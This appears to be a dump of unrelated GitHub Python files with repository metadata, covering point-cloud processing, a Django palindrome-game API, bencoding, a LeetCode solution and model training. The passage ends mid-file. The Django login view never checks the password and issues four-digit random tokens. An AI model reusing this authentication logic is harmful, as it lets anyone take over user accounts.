坐标系\n coord.transform(flip_transform)\n # OPEN3D end\n\n # Streaming loop\n frame_count = 0\n\n # while True:\n for frame_idx in range(1):\n\n s_time = time.time()\n\n frame_path = 'D:/SIA/Dataset/Kinect2/depth/1.bmp'\n\n # Align the depth frame to color frame\n # aligned_frames = align.process(frames)\n\n # 对齐 rgbd\n # 加载\n depth_img = cv2.imread(frame_path, 0)\n 
print(depth_img)\n print(shape(depth_img))\n\n # 整个点云\n pts = get_cloud_xyz(depth_img, depth_scale, u0, v0, fx, fy)\n # pts, color = get_cloud_xyzrgb(depth_img, rgb_img, depth_scale, u0, v0, fx, fy)\n # print(pts.shape)\n\n # # 使用open3d 查看效果\n pcd.points = o3d.utility.Vector3dVector(pts) # 效率极低! 30FPS -》 2.7FPS。。。\n # pcd.colors = o3d.utility.Vector3dVector(color)\n\n # show_pcd(pcd)\n\n # 写文件\n o3d.io.write_point_cloud(str(frame_count) + '.ply', pcd)\n\n pcd.transform(flip_transform)\n\n if frame_count == 0:\n vis.add_geometry(pcd)\n vis.add_geometry(coord)\n\n vis.update_geometry(pcd)\n vis.poll_events()\n vis.update_renderer()\n\n frame_count += 1\n\n delta_time = time.time() - s_time\n print('FPS:', 1/delta_time)\n", "repo_name": "antenna-fast/PoseEstimation", "sub_path": "dataset/real_camera/depth_to_pcd.py", "file_name": "depth_to_pcd.py", "file_ext": "py", "file_size_in_byte": 4976, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.set_printoptions", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "open3d.visualization.Visualizer", "line_number": 123, "usage_type": "call"}, {"api_name": "open3d.visualization", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 128, "usage_type": "call"}, {"api_name": "open3d.geometry.PointCloud", "line_number": 131, "usage_type": "call"}, {"api_name": "open3d.geometry", "line_number": 131, "usage_type": "attribute"}, {"api_name": "open3d.geometry.TriangleMesh.create_coordinate_frame", "line_number": 134, "usage_type": "call"}, {"api_name": "open3d.geometry", "line_number": 134, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 153, "usage_type": "call"}, {"api_name": "open3d.utility.Vector3dVector", "line_number": 163, "usage_type": "call"}, {"api_name": "open3d.utility", "line_number": 163, "usage_type": "attribute"}, {"api_name": "open3d.io.write_point_cloud", "line_number": 169, "usage_type": "call"}, {"api_name": "open3d.io", "line_number": 169, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}]} +{"seq_id": "32477861647", "text": "from django.contrib.auth.models import User as auth_user\nfrom django.http import JsonResponse\nimport json\nfrom random import randint\n\nfrom .models import *\n\n# Create your views here.\n\ndef get_session_obj(token):\n return Session.objects.filter(token = token).first()\n\ndef check_session(session):\n return (session is None) or (not session.status)\n\ndef create_new_user(request):\n if request.method == 'POST':\n payload = json.loads(request.body)\n user_name = payload['name']\n user_email = payload['email']\n user_password = payload['password']\n\n isUserExists = 
auth_user.objects.filter(email=user_email).first()\n if isUserExists:\n return JsonResponse({'status':'User Already Exists'})\n else:\n new_auth_user = auth_user.objects.create_user(username = user_name, email=user_email, password=user_password)\n if new_auth_user:\n new_user = User()\n new_user.to_db(payload)\n new_user.save()\n return JsonResponse({'status':'User Created Successfully'})\n else:\n return JsonResponse({'status':'Failed to Create New User'})\n \n else:\n return JsonResponse({'status':'Invalid Request Method, only POST Method is Allowed'})\n\ndef update_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n payload = json.loads(request.body)\n user_obj = User.objects.filter(id = session_obj.user.id).first()\n user_obj.to_db(payload)\n user_obj.save()\n return JsonResponse({'status': 'User Details Updated Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef delete_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n auth_obj = auth_user.objects.filter(email = session_obj.user.email)\n auth_obj.delete()\n\n user_obj = User.objects.filter(id = session_obj.user.id).first()\n user_obj.delete()\n return JsonResponse({'status': 'User Deleted Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef login_user(request):\n if request.method == 'POST':\n payload = json.loads(request.body)\n user_email = payload['email']\n user_password = payload['password']\n\n auth_obj = auth_user.objects.filter(email = user_email).first()\n if auth_obj is not None:\n user_obj = User.objects.filter(email = user_email).first()\n session_obj = Session.objects.filter(user = user_obj).first()\n if session_obj is None:\n token = randint(1000, 9999)\n data = {'token': token, 'status': True, 'user': user_obj}\n\n session_obj = Session()\n session_obj.to_db(data)\n session_obj.save()\n return JsonResponse({'status': 'User Logged in Successfully', 'token': token})\n \n else:\n if session_obj.status:\n return JsonResponse({'status': 'User Already Logged in'})\n else:\n session_obj.status = True\n session_obj.save()\n return JsonResponse({'status': 'User Logged in Successfully', 'token': session_obj.token})\n \n else:\n return JsonResponse({'status': 'User Does Not Exist'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n \ndef logout_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n session_obj.status = False\n session_obj.save()\n return JsonResponse({'status': 'User Logged out Successfully'})\n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef check_palindrome(string):\n return string == string[::-1]\n\ndef start_game(request):\n if request.method == 'GET':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game = Game.objects.filter(session = 
session_obj).first()\n if game is not None:\n game.status = False\n game.save()\n \n new_game = Game()\n new_game.session = session_obj\n new_game.save()\n return JsonResponse({'status':'Game Started Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n\ndef get_board(request):\n if request.method == 'GET':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game_obj = Game.objects.filter(session = session_obj).first()\n return JsonResponse({'string': game_obj.game_string})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n\ndef update_board(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game_obj = Game.objects.filter(session = session_obj).first()\n if len(game_obj.game_string) == 6:\n is_palindrome = check_palindrome(game_obj.game_string)\n game_obj.is_palindrome = is_palindrome\n game_obj.save()\n return JsonResponse({'status': 'Game String is a Palindrome (Cannot Update the Board Anymore)' if is_palindrome else 'Game String is not a Palindrome (Cannot Update the Board Anymore)'})\n else:\n payload = json.loads(request.body)\n game_obj.game_string = game_obj.game_string + payload['char'][0]\n game_obj.save()\n return JsonResponse({'status': 'Updated Game Board'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n \ndef get_game_list(request):\n if request.method == 'GET':\n games = Game.objects.all()\n game_ids = []\n for each_game in games:\n print(each_game)\n game_ids.append(each_game.pk)\n return JsonResponse({'Games IDs': game_ids})\n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n", "repo_name": "laminarss/palindrome-game-django", "sub_path": "project_palindrome/app_game/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 27, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, 
{"api_name": "django.http.JsonResponse", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 62, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 78, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 83, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 97, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 100, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 103, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 110, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 114, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 116, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 136, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 139, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 146, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 149, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 152, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 159, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 168, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 171, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 174, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 183, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 185, "usage_type": "call"}]} +{"seq_id": "28973881098", "text": "#readFromSql.py\nimport pandas as pd\nimport sqlalchemy as alc\nimport urllib\n\ndef getFromSql (tableName):\n params = urllib.parse.quote_plus(\n 'DRIVER={SQL Server};'+\n 'SERVER=DESKTOP-SQU7IEK;'+\n 'DATABASE=pfizer;'+\n 'Trusted_Connection=yes'\n )\n engine = alc.create_engine(\"mssql+pyodbc:///?odbc_connect=%s\" % params)\n\n df = pd.read_sql(tableName, con=engine)\n return df\n\n \n\n ", "repo_name": "PerlantidisStefanos/simple_flask_communication", "sub_path": "readFromSql.py", "file_name": "readFromSql.py", "file_ext": "py", "file_size_in_byte": 404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": 
"urllib.parse.quote_plus", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sqlalchemy.create_engine", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "19175112182", "text": "import typing\nfrom lbry.dht.error import DecodeError\n\n\ndef _bencode(data: typing.Union[int, bytes, bytearray, str, list, tuple, dict]) -> bytes:\n if isinstance(data, int):\n return b'i%de' % data\n elif isinstance(data, (bytes, bytearray)):\n return b'%d:%s' % (len(data), data)\n elif isinstance(data, str):\n return b'%d:%s' % (len(data), data.encode())\n elif isinstance(data, (list, tuple)):\n encoded_list_items = b''\n for item in data:\n encoded_list_items += _bencode(item)\n return b'l%se' % encoded_list_items\n elif isinstance(data, dict):\n encoded_dict_items = b''\n keys = data.keys()\n for key in sorted(keys):\n encoded_dict_items += _bencode(key)\n encoded_dict_items += _bencode(data[key])\n return b'd%se' % encoded_dict_items\n else:\n raise TypeError(f\"Cannot bencode {type(data)}\")\n\n\ndef _bdecode(data: bytes, start_index: int = 0) -> typing.Tuple[typing.Union[int, bytes, list, tuple, dict], int]:\n if data[start_index] == ord('i'):\n end_pos = data[start_index:].find(b'e') + start_index\n return int(data[start_index + 1:end_pos]), end_pos + 1\n elif data[start_index] == ord('l'):\n start_index += 1\n decoded_list = []\n while data[start_index] != ord('e'):\n list_data, start_index = _bdecode(data, start_index)\n decoded_list.append(list_data)\n return decoded_list, start_index + 1\n elif data[start_index] == ord('d'):\n start_index += 1\n decoded_dict = {}\n while data[start_index] != ord('e'):\n key, start_index = _bdecode(data, start_index)\n value, start_index = _bdecode(data, start_index)\n decoded_dict[key] = value\n return decoded_dict, start_index\n else:\n split_pos = data[start_index:].find(b':') + start_index\n try:\n length = int(data[start_index:split_pos])\n except (ValueError, TypeError) as err:\n raise DecodeError(err)\n start_index = split_pos + 1\n end_pos = start_index + length\n return data[start_index:end_pos], end_pos\n\n\ndef bencode(data: typing.Dict) -> bytes:\n if not isinstance(data, dict):\n raise TypeError()\n return _bencode(data)\n\n\ndef bdecode(data: bytes, allow_non_dict_return: typing.Optional[bool] = False) -> typing.Dict:\n assert isinstance(data, bytes), DecodeError(f\"invalid data type: {str(type(data))}\")\n\n if len(data) == 0:\n raise DecodeError('Cannot decode empty string')\n try:\n result = _bdecode(data)[0]\n if not allow_non_dict_return and not isinstance(result, dict):\n raise ValueError(f'expected dict, got {type(result)}')\n return result\n except (ValueError, TypeError) as err:\n raise DecodeError(err)\n", "repo_name": "lbryio/lbry-sdk", "sub_path": "lbry/dht/serialization/bencoding.py", "file_name": "bencoding.py", "file_ext": "py", "file_size_in_byte": 2839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7218, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Union", "line_number": 5, "usage_type": "attribute"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 28, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 28, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 58, "usage_type": "attribute"}, {"api_name": "typing.Optional", 
"line_number": 64, "usage_type": "attribute"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 65, "usage_type": "call"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 68, "usage_type": "call"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 75, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "21757375059", "text": "# -*- coding:utf-8 -*-\n# author: hpf\n# create time: 2020/10/22 9:38\n# file: 111_二叉树的最小深度.py\n# IDE: PyCharm\n\n# 题目描述:\n# 给定一个二叉树,找出其最小深度。\n#\n# 最小深度是从根节点到最近叶子节点的最短路径上的节点数量。\n#\n# 说明: 叶子节点是指没有子节点的节点。\n#\n# 示例:\n#\n# 给定二叉树 [3,9,20,null,null,15,7],\n#\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# 返回它的最小深度  2.\n\n# 解法一: BFS\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution1:\n def minDepth(self, root: TreeNode) -> int:\n if not root:\n return 0\n\n from collections import deque\n q = deque()\n\n # root本身就是一层,depth初始化为1\n q.append(root)\n depth = 1\n\n while(q):\n size = len(q)\n # 将当前队列中的所有节点向四周扩散\n for _ in range(size):\n node = q.popleft()\n # 判断是否到达终点\n if not node.left and not node.right:\n return depth\n # 将node的相邻节点��入队列\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n # 这里增加步数\n depth += 1\n\n return depth\n\n# 解法二: DFS\n\n# 先看使用 DFS(深度优先搜索)的方法,具体做法如下:\n#\n# 根节点为空,返回 0;\n# 如果根节点不为空,需要判断左右子节点:\n# 左右子节点都为空,那么返回 1;\n# 左右子节点其中一个为空,那么返回不为空子节点的最小深度;\n# 左右子节点均不为空,返回其中较小深度的值。\n\n\n\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n # 根节点为空\n if not root:\n return 0\n # 根节点不为空,但不存在左右子节点,返回 1\n if not root.left and not root.right:\n return 1\n\n depth = 1\n\n # 返回不为空的右子节点最小深度\n if not root.left:\n depth += self.minDepth(root.right)\n # 不存在右子节点,返回不为空的左子节点最小深度\n elif not root.right:\n depth += self.minDepth(root.left)\n # 左右子节点均不为空,返回较小深度\n else:\n left_depth = self.minDepth(root.left)\n right_depth = self.minDepth(root.right)\n depth += min(left_depth, right_depth)\n\n return depth", "repo_name": "hpf0532/algorithms_demo", "sub_path": "leetcode/111_二叉树的最小深度.py", "file_name": "111_二叉树的最小深度.py", "file_ext": "py", "file_size_in_byte": 2702, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "14474576552", "text": "# coding=utf-8\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nimport gluoncv as gcv\nfrom model_zoo import east, EASTLoss, east_fpn\nfrom data.ic_data import text_detection_data\nfrom mxnet.gluon.data import DataLoader\nfrom mxnet.gluon import utils\nimport logging\nimport os, sys\nfrom mxboard import SummaryWriter\nimport numpy as np\nfrom mxnet import lr_scheduler as ls\n\nlogging.basicConfig(level=logging.INFO)\n\ndef main(train_dir, ctx=None, lr=0.0001, epoches=20, batch_size=16, checkpoint_path='model', debug=False):\n summ_writer = SummaryWriter(checkpoint_path)\n # dataloader\n ctx = eval(ctx)\n context = mx.gpu(ctx) if ctx > 0 else mx.cpu()\n ic_data = text_detection_data(image_dir=train_dir)\n ic_dataloader = DataLoader(dataset=ic_data, batch_size=batch_size, shuffle=True, num_workers=16)\n data_num = len(ic_dataloader) * batch_size\n # model\n east_model = east.EAST(nclass=2, text_scale=1024)\n # east_model = east(text_scale=1024)\n\n east_model.collect_params().initialize(init=mx.init.Xavier(), verbose=True, ctx=context)\n if not debug:\n east_model.hybridize()\n 
cos_shc = ls.PolyScheduler(max_update=ic_dataloader.length * epoches//batch_size, base_lr=lr)\n\n trainer = gluon.Trainer(east_model.collect_params(),\n 'sgd',\n {'learning_rate': lr,\n 'wd': 1e-5,\n 'momentum': 0.9,\n 'clip_gradient': 5,\n 'lr_scheduler':cos_shc}\n )\n EAST_loss = EASTLoss(cls_weight=0.01, iou_weight=1.0, angle_weight=20)\n step = 0\n lr_counter = 0\n lr_steps = [5, 10, 15, 20]\n lr_factor = 0.9\n\n for epoch in range(epoches):\n loss = []\n if epoch == lr_steps[lr_counter]:\n trainer.set_learning_rate(trainer.learning_rate*lr_factor)\n lr_counter += 1\n for i, batch_data in enumerate(ic_dataloader):\n im, score_map, geo_map, training_mask = map(lambda x: x.as_in_context(ctx), batch_data)\n\n with autograd.record(train_mode=True):\n\n f_score, f_geo = east_model(im)\n batch_loss = EAST_loss(score_map, f_score, geo_map, f_geo, training_mask)\n loss.append(batch_loss)\n batch_loss.backward()\n\n trainer.step(batch_size)\n # if i % 2 == 0:\n step = epoch * data_num + i * batch_size\n model_loss = np.mean(map(lambda x: x.asnumpy()[0], loss))\n summ_writer.add_scalar('model_loss', model_loss[0])\n logging.info(\"step: {}, loss: {}\".format(step, batch_loss.asnumpy()))\n ckpt_file = os.path.join(checkpoint_path, \"model_{}.params\".format(step))\n east_model.save_parameters(ckpt_file)\n logging.info(\"save model to {}\".format(ckpt_file))\n\nif __name__ == '__main__':\n train_dir = sys.argv[1]\n ckpt_path = sys.argv[2]\n ctxes = sys.argv[3]\n main(train_dir=train_dir, ctx=ctxes, checkpoint_path=ckpt_path, debug=True)\n", "repo_name": "saicoco/Gluon-EAST", "sub_path": "scripts/train_east.py", "file_name": "train_east.py", "file_ext": "py", "file_size_in_byte": 3058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 15, "usage_type": "attribute"}, {"api_name": "mxboard.SummaryWriter", "line_number": 18, "usage_type": "call"}, {"api_name": "mxnet.gpu", "line_number": 21, "usage_type": "call"}, {"api_name": "mxnet.cpu", "line_number": 21, "usage_type": "call"}, {"api_name": "data.ic_data.text_detection_data", "line_number": 22, "usage_type": "call"}, {"api_name": "mxnet.gluon.data.DataLoader", "line_number": 23, "usage_type": "call"}, {"api_name": "model_zoo.east.EAST", "line_number": 26, "usage_type": "call"}, {"api_name": "model_zoo.east", "line_number": 26, "usage_type": "name"}, {"api_name": "mxnet.init.Xavier", "line_number": 29, "usage_type": "call"}, {"api_name": "mxnet.init", "line_number": 29, "usage_type": "attribute"}, {"api_name": "mxnet.lr_scheduler.PolyScheduler", "line_number": 32, "usage_type": "call"}, {"api_name": "mxnet.lr_scheduler", "line_number": 32, "usage_type": "name"}, {"api_name": "mxnet.gluon.Trainer", "line_number": 34, "usage_type": "call"}, {"api_name": "mxnet.gluon", "line_number": 34, "usage_type": "name"}, {"api_name": "model_zoo.EASTLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "mxnet.autograd.record", "line_number": 56, "usage_type": "call"}, {"api_name": "mxnet.autograd", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 71, 
"usage_type": "call"}, {"api_name": "sys.argv", "line_number": 74, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}]} +{"seq_id": "70183338728", "text": "from django import forms\nfrom .models import *\n\n\nclass BackupSearch(forms.Form):\n start_date = forms.DateField(required=False, widget=forms.DateInput(attrs={'type': 'date',\n 'class': 'width-100',\n 'required': False}))\n end_date = forms.DateField(required=False, widget=forms.DateInput(attrs={'type': 'date',\n 'class': 'width-100',\n 'required': False}))\n name = forms.CharField(required=False, widget=forms.DateInput(attrs={'class': 'width-100',\n 'required': False}))\n\n\nclass UploadBackupForm(forms.Form):\n # allow .zip files only\n file = forms.FileField(required=True, widget=forms.FileInput(attrs={'id': 'backup_field', 'accept': '.zip'}))\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['body']\n widgets = {\n 'body': forms.Textarea(attrs={'rows': 1, 'cols': 115, 'placeholder': 'Add a comment...'})\n }\n labels = {k: \"\" for k in fields}\n", "repo_name": "Fingolfin7/SoftriteAPI", "sub_path": "backups/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms.DateField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.FileInput", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "6404845655", "text": "import config\nfrom util.BibleVerseParser import BibleVerseParser\n\nif config.pluginContext:\n config.mainWindow.showNoteEditor()\n parser = BibleVerseParser(config.parserStandarisation)\n verseList = parser.extractAllReferences(config.pluginContext, False)\n if not verseList:\n config.mainWindow.displayMessage(config.thisTranslation[\"message_noReference\"])\n else:\n content = \"; \".join([parser.bcvToVerseReference(*verse) for verse in verseList])\n\n if hasattr(config.mainWindow, \"noteEditor\"):\n content = \"
{0}
\".format(content)\n if config.mainWindow.noteEditor.noteEditor.html:\n config.mainWindow.noteEditor.noteEditor.editor.insertHtml(content)\n else:\n config.mainWindow.noteEditor.noteEditor.editor.insertPlainText(content)\n else:\n config.contextItem = content\n config.mainWindow.createNewNoteFile()\nelse:\n config.contextSource.messageNoSelection()\n", "repo_name": "eliranwong/UniqueBible", "sub_path": "plugins/context/Insert References into Note Editor.py", "file_name": "Insert References into Note Editor.py", "file_ext": "py", "file_size_in_byte": 992, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 104, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.pluginContext", "line_number": 4, "usage_type": "attribute"}, {"api_name": "config.mainWindow.showNoteEditor", "line_number": 5, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 5, "usage_type": "attribute"}, {"api_name": "util.BibleVerseParser.BibleVerseParser", "line_number": 6, "usage_type": "call"}, {"api_name": "config.parserStandarisation", "line_number": 6, "usage_type": "attribute"}, {"api_name": "config.pluginContext", "line_number": 7, "usage_type": "attribute"}, {"api_name": "config.mainWindow.displayMessage", "line_number": 9, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.thisTranslation", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.mainWindow", "line_number": 13, "usage_type": "attribute"}, {"api_name": "config.mainWindow", "line_number": 15, "usage_type": "attribute"}, {"api_name": "config.mainWindow.noteEditor.noteEditor.editor.insertHtml", "line_number": 16, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 16, "usage_type": "attribute"}, {"api_name": "config.mainWindow.noteEditor.noteEditor.editor.insertPlainText", "line_number": 18, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 18, "usage_type": "attribute"}, {"api_name": "config.contextItem", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.mainWindow.createNewNoteFile", "line_number": 21, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.contextSource.messageNoSelection", "line_number": 23, "usage_type": "call"}, {"api_name": "config.contextSource", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "72894779048", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom sklearn import linear_model\n\n\nclass Regression:\n def __init__(self, lamb, m=1):\n self.lamb = lamb\n self.w = None\n self.M = m\n\n def fonction_base_polynomiale(self, x):\n \"\"\"\n Fonction de base qui projette la donnee x vers un espace polynomial tel que mentionne au chapitre 3.\n Si x est un scalaire, alors phi_x sera un vecteur à self.M dimensions : (x^1,x^2,...,x^self.M)\n Si x est un vecteur de N scalaires, alors phi_x sera un tableau 2D de taille NxM\n\n NOTE : En mettant phi_x = x, on a une fonction de base lineaire qui fonctionne pour une regression lineaire\n \"\"\"\n\n if np.isscalar(x):\n return x ** np.arange(self.M+1)\n\n return x[:, None] ** np.arange(self.M+1)\n\n def recherche_hyperparametre(self, X, t):\n \"\"\"\n Validation croisee de type \"k-fold\" pour k=10 utilisee pour trouver la meilleure valeur pour\n l'hyper-parametre self.M.\n\n Le resultat est mis dans la 